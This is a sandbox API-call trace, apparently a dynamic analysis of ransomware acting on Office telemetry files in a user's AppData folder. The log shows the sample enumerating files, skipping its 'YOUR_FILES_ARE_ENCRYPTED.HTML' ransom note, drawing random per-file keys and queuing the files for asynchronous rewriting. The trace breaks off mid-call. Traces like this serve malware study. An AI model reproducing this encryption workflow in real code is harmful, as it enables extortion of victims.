ftCreationTime.dwLowDateTime=0xdf89aaa0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xdf89aaa0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xdf89aaa0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x345, dwReserved0=0x0, dwReserved1=0x60, cFileName="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat", cAlternateFileName="{DF01D~1.DAT")) returned 1 [0159.660] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat") returned 144 [0159.660] lstrcmpW (lpString1="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.660] PathFindExtensionW (pszPath="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat") returned=".dat" [0159.660] lstrlenW (lpString=".dat") returned 4 [0159.660] PathFindExtensionW (pszPath="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat") returned=".dat" [0159.660] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{df01d142-853f-4ec3-8f09-c2194cb1a39c} (0) - 2104 - excel.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.661] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=837) returned 1 [0159.661] GetProcessHeap () returned 0x270000 [0159.661] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.662] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="FE") returned 2 [0159.662] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="32") returned 2 [0159.662] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="3F") returned 2 [0159.662] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="BC") returned 2 [0159.662] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="C2") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="63") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="29") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="F7") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="66") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="0D") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="99") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="46") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="FE") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="E3") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="0D") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="C2") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="4C") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="9B") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="AD") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="08") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="AD") returned 2 [0159.663] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="2C") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="10") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="03") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="F9") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="4F") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="3A") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="F4") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="E0") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="DD") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="ED") returned 2 [0159.664] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="09") returned 2 [0159.665] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat" [0159.665] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.665] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.682] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdf8c0c00, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xdf8c0c00, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xdf8c0c00, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12c, dwReserved0=0x0, dwReserved1=0x60, cFileName="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTele.dat", cAlternateFileName="{DF01D~4.DAT")) returned 1 [0159.682] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTele.dat") returned 134 [0159.682] lstrcmpW (lpString1="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTele.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.682] PathFindExtensionW (pszPath="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTele.dat") returned=".dat" [0159.682] lstrlenW (lpString=".dat") returned 4 [0159.682] PathFindExtensionW (pszPath="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTele.dat") returned=".dat" [0159.682] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTele.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{df01d142-853f-4ec3-8f09-c2194cb1a39c} (1) - 2104 - excel.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.683] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=300) returned 1 [0159.683] CloseHandle (hObject=0x58c) returned 1 [0159.683] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdf8c0c00, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xdf8c0c00, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xdf8c0c00, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x1e1, dwReserved0=0x0, dwReserved1=0x60, cFileName="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTeleMediumCost.dat", cAlternateFileName="{DF01D~3.DAT")) returned 1 [0159.683] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTeleMediumCost.dat") returned 144 [0159.683] lstrcmpW (lpString1="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTeleMediumCost.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.683] PathFindExtensionW (pszPath="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTeleMediumCost.dat") returned=".dat" [0159.683] lstrlenW (lpString=".dat") returned 4 [0159.683] PathFindExtensionW (pszPath="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTeleMediumCost.dat") returned=".dat" [0159.683] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{df01d142-853f-4ec3-8f09-c2194cb1a39c} (1) - 2104 - excel.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.684] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=481) returned 1 [0159.684] CloseHandle (hObject=0x58c) returned 1 [0159.684] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82a878d0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x82a878d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x82a878d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x11b, dwReserved0=0x0, dwReserved1=0x60, cFileName="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTele.dat", cAlternateFileName="{FBC13~2.DAT")) returned 1 [0159.684] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTele.dat") returned 136 [0159.684] lstrcmpW (lpString1="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTele.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.684] PathFindExtensionW (pszPath="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTele.dat") returned=".dat" [0159.684] lstrlenW (lpString=".dat") returned 4 [0159.684] PathFindExtensionW (pszPath="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTele.dat") returned=".dat" [0159.684] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.684] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTele.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{fbc1308d-923e-401e-bdf2-42b4c79814cf} (0) - 1504 - outlook.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.685] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=283) returned 1 [0159.685] CloseHandle (hObject=0x58c) returned 1 [0159.685] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82a878d0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x82a878d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x82a878d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x34d, dwReserved0=0x0, dwReserved1=0x60, cFileName="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat", cAlternateFileName="{FBC13~1.DAT")) returned 1 [0159.685] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat") returned 146 [0159.685] lstrcmpW (lpString1="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.685] PathFindExtensionW (pszPath="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat") returned=".dat" [0159.685] lstrlenW (lpString=".dat") returned 4 [0159.685] PathFindExtensionW (pszPath="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat") returned=".dat" [0159.685] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{fbc1308d-923e-401e-bdf2-42b4c79814cf} (0) - 1504 - outlook.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.686] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=845) returned 1 [0159.686] GetProcessHeap () returned 0x270000 [0159.686] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.689] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="A3") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="7F") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="61") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="B4") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="DD") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="4A") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="14") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="D7") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="13") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="88") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="1A") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="46") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="4E") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="F5") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="A8") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="41") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="10") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="1E") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="B4") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="F9") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="04") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="28") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="28") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="D2") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="0C") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="6C") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="77") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="35") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="80") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="AE") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="7A") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="5E") returned 2 [0159.690] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat" [0159.690] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.690] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.762] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82a878d0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x82a878d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x82a878d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0xb8, dwReserved0=0x0, dwReserved1=0x60, cFileName="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTele.dat", cAlternateFileName="{FBC13~4.DAT")) returned 1 [0159.762] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTele.dat") returned 136 [0159.762] lstrcmpW (lpString1="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTele.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.762] PathFindExtensionW (pszPath="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTele.dat") returned=".dat" [0159.762] lstrlenW (lpString=".dat") returned 4 [0159.762] PathFindExtensionW (pszPath="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTele.dat") returned=".dat" [0159.762] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTele.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{fbc1308d-923e-401e-bdf2-42b4c79814cf} (1) - 1504 - outlook.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.763] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=184) returned 1 [0159.763] CloseHandle (hObject=0x58c) returned 1 [0159.763] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82a878d0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x82a878d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x82a878d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x60, cFileName="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat", cAlternateFileName="{FBC13~3.DAT")) returned 1 [0159.763] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat") returned 146 [0159.764] lstrcmpW (lpString1="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.764] PathFindExtensionW (pszPath="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat") returned=".dat" [0159.764] lstrlenW (lpString=".dat") returned 4 [0159.764] PathFindExtensionW (pszPath="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat") returned=".dat" [0159.764] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{fbc1308d-923e-401e-bdf2-42b4c79814cf} (1) - 1504 - outlook.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.764] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=521) returned 1 [0159.764] GetProcessHeap () returned 0x270000 [0159.764] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.765] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="7D") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="92") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="0B") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="21") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="38") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="90") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="21") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="95") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="3A") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="16") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="19") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="A1") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="28") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="B9") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="7E") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="83") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="5E") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="CA") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="95") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="CC") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="C2") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="6D") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="92") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="0C") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="68") returned 2 [0159.767] wsprintfW (in: 